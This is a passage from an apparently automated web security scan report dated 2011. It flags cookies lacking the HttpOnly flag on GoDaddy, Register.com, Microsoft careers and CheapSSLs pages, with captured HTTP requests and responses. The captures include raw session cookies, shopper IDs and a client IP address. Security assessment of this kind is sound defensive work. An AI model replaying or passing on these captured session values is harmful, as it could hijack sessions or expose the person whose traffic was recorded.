The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response

11.75. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=6; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.76. http://www.godaddy.com/affiliates/affiliate-program.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/affiliates/affiliate-program.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

11.77. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=24&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

11.78. http://www.godaddy.com/shared/video/videos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/shared/video/videos.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.79. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/JsonContent/GetMultiDomainsPlanList.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:29:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.80. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215917&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&referringdomain=&split=69; domain=godaddy.com; path=/
BlueLithium_ssl=rezcqjcaqgtalgqbijnijijbnhagqigb; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.81. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/model/remote/remoteTrackingManager.cfc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx;path=/
LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /model/remote/remoteTrackingManager.cfc?_=1315055374751&method=trackPage&returnFormat=json&referrer=http%3A%2F%2Fmicrosoftcambridge.com%2FWorking%2FJobs%2Ftabid%2F145%2FDefault.aspx&saveurl=%2Fjob%2FCambridge-SDE-2C-Senior-763405-Job-MA-02138%2F1388917%2F%3Futm_source%3DJ2WRSS%26utm_medium%3Drss%26utm_campaign%3DNERD&type=jobid&data=1388917 HTTP/1.1
Host: www.microsoft-careers.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/?utm_source=J2WRSS&utm_medium=rss&utm_campaign=NERD
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.2.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Set-Cookie: REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx;path=/
Set-Cookie: LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD;path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8

{"SUCCESS":true}

11.82. http://www.register.com/css/basic.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/css/basic.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDC26718D67410D617BB9E98795010A3; Path=/; Domain=.register.com
TSfd06f3=d2937cbf720198647e74b325b537776034fb6f4d2b0d40564e629da2286023f234aaaa7a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.83. http://www.register.com/css/titan-screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/css/titan-screen.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDC29F30D67410D61BCEC691FA7F6315; Path=/; Domain=.register.com
TSfd06f3=674af69769fa119224d9d19bfb161e4634fb6f4d2b0d40564e629da2286023f2beb4fbf0948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.84. http://www.register.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSfd06f3=28f459a1dad472bee2083022db5935e111bd6e7cd488bdb94e62a18660ac0ec59b93f92c; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:52:06 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Accept-Ranges: bytes
ETag: W/"1150-1314603996000"
Last-Modified: Mon, 29 Aug 2011 07:46:36 GMT
Content-Length: 1150
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/x-icon
Set-Cookie: TSfd06f3=28f459a1dad472bee2083022db5935e111bd6e7cd488bdb94e62a18660ac0ec59b93f92c; Path=/

............ .h.......(....... ..... ............................................dq...`...V...V...^...m......t...........................,t...O...<...6..4.}.4.|.5.~.:...J...n......@...............&l.
...[SNIP]...

11.85. http://www.register.com/imgs/global/btnChooseAPackage_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/btnChooseAPackage_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/btnChooseAPackage_on.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/
Cookie: TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; TLTSID=E7F82DE2D67410D60DB8F7326230B644; JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; mbox=check#true#1315085956|session#1315085812182-148030#1315087758|PC#1315085812182-148030.19#1317677898; OAX=Mhd7ak5indMAAU0C; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.5.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085841752; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085841752|ABID=670543778; R=rcomCookieTS&2011-09-03/17.37.21&trkid&SEO000000000W&

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:42:42 GMT
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:34 GMT
ETag: "303b12-699-4aba018152a80"
Accept-Ranges: bytes
Content-Length: 1689
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/

GIF89a..(.........T........g..C...........e..E..h.....b......................................................!.......,......(.... %.di.h..l..p,..d.x..|....pH,.i#[d.l:...tJ.Z...V{.)...xL.....z.n...wS..
...[SNIP]...

11.86. http://www.register.com/imgs/global/btnFindIt_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/btnFindIt_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/btnFindIt_on.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/
Cookie: TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; TLTSID=E7F82DE2D67410D60DB8F7326230B644; JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; mbox=check#true#1315085956|session#1315085812182-148030#1315087758|PC#1315085812182-148030.19#1317677898; OAX=Mhd7ak5indMAAU0C; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.5.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085841752; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085841752|ABID=670543778; R=rcomCookieTS&2011-09-03/17.37.21&trkid&SEO000000000W&

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:42:42 GMT
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:26 GMT
ETag: "109a16-4fd-4aba0179b1880"
Accept-Ranges: bytes
Content-Length: 1277
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/

GIF89aZ./......w........j...........X..i........M../........k........@.....@..T..............................!.......,....Z./.....'....h..l..pW..wnx..|.....T+..H.r.l:...t.A
6.b.w.x...xL...h.F...h.kzN.
...[SNIP]...

11.87. http://www.register.com/imgs/global/crtIcon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/crtIcon.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; Path=/; Domain=.register.com
TSfd06f3=989560f402c52ef6e5467a0378482f6234fb6f4d2b0d40564e629da2286023f235ed6f81948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.88. http://www.register.com/imgs/global/registerLogo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/imgs/global/registerLogo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BEB0737CD67410D61C12CE72E6515F79; Path=/; Domain=.register.com
TSfd06f3=36a9a6be0fb65991f3e0ada517cd8fc334fb6f4d2b0d40564e629da2286023f2d77d8819948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.89. http://www.register.com/js/aop-attach.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/aop-attach.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BE9FF4FCD67410D61AE2879D611DB162; Path=/; Domain=.register.com
TSfd06f3=153cfa4d0e155325732f47ed9bffcede34fb6f4d2b0d40564e629da2286023f28cb47c3f948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.90. http://www.register.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/global.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDF05740D67410D61BCAF1EA8061C90E; Path=/; Domain=.register.com
TSfd06f3=980743b8ff4ec39c11121c1d3b73b51a34fb6f4d2b0d40564e629da2286023f23b79d92e948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.91. http://www.register.com/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDEEFB98D67410D61AB284001024AF96; Path=/; Domain=.register.com
TSfd06f3=e8f3561ae36189d24acc768ec35fb74a34fb6f4d2b0d40564e629da2286023f278b2737d948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.92. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery-ui-1.7.1.custom.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDF9F0ACD67410D61D11B0753FBACCA0; Path=/; Domain=.register.com
TSfd06f3=301b647cf522da421558aacb50cc2aa234fb6f4d2b0d40564e629da2286023f26c256ffa948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.93. http://www.register.com/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery.cookie.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDF5A8C6D67410D617CC97B16A7B361F; Path=/; Domain=.register.com
TSfd06f3=4d632488d63df192acaddb778076d1e434fb6f4d2b0d40564e629da2286023f20d60c5e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.94. http://www.register.com/js/jquery.jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery.jcarousellite.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BDEF2F14D67410D61AB7CB3A6F264AD2; Path=/; Domain=.register.com
TSfd06f3=6cb398fe6f3b95e43e8ce0909fb5138934fb6f4d2b0d40564e629da2286023f26b0cd9e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.95. http://www.register.com/js/mbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/mbox.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BE921B52D67410D610B7F5DDB44FC95E; Path=/; Domain=.register.com
TSfd06f3=c71c7a115bf6f15bfb96be371425b9f134fb6f4d2b0d40564e629da2286023f2951be06a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.96. http://www.register.com/js/nicejforms.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/nicejforms.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BEB668E0D67410D61C0F8B256BAF5161; Path=/; Domain=.register.com
TSfd06f3=f6bf8e381ccc97699cb09ef86948cfb734fb6f4d2b0d40564e629da2286023f20921a71a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.97. http://www.register.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BEBC2690D67410D6183AD437200921A1; Path=/; Domain=.register.com
TSfd06f3=184443db25c7545d79e2025b8b0c50dd34fb6f4d2b0d40564e629da2286023f28ac38e07948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.98. http://www.register.com/js/thickbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/thickbox.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=BE922F8ED67410D61801BB428335AC70; Path=/; Domain=.register.com
